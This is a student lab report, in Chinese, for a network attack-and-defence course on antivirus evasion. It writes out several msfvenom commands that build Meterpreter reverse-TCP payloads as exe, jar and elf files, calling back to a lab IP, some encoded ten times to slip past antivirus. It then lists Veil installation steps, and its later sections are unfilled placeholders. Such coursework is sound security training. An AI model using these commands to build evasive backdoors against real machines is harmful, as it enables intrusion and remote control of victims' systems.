20222410 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

• 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧
  • 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
  • veil，加壳工具
  • 使用C + shellcode编程
• 通过组合应用各种技术实现恶意代码免杀
  如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。
• 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

2.实验过程

2.1 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

2.1.1 正确使用msf编码器，使用msfvenom生成如jar之类的其他文件

查看 msfvenom 支持的所有输出格式：输入msfvenom --list formats

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh.exe，生成payload

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型，是一个 Meterpreter 反向 TCP 连接
LHOST=192.168.136.132 设置了连接回的本地 IP 地址，即kali虚拟机的 IP 地址
LPORT=2410 设置了连接回的本地端口号，这里为学号后四位
-f exe: 这指定了输出格式为 Windows 可执行文件

查看 msfvenom 支持的所有编码方式：输入msfvenom --list encoders

使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-2.exe

-e x86/shikata_ga_nai: 这指定了要使用的编码器；
-b ‘\x00’: 这指定了需要避免的坏字符集；
LHOST、LPORT同上；

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-3.exe
-i 10表示编码10次

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f jar > 20222410yh-4.jar

使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f jar > 20222410yh-5.jar

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f elf > 20222410yh-6.elf

使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f elf > 20222410yh-7.elf

将生成的20222410yh.exe等多个文件放到共享文件夹中传到主机上
20222410yh.exe:

20222410yh-2.exe:

20222410yh-3.exe:

20222410yh-5.jar:

20222410yh-7.elf:

2.1.2 使用veil工具

安装veil，需要保持虚拟机是联网状态，依次输入以下命令：

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32

当输入完sudo apt-get install wine32后报错，此时先输入dpkg --add-architecture i386，再输入sudo apt-get update，然后输入sudo apt-get install wine32即可

3.问题及解决方案

• 问题1：XXXXXX
• 问题1解决方案：XXXXXX
• 问题2：XXXXXX
• 问题2解决方案：XXXXXX - ...

4.学习感悟、思考等

xxx xxx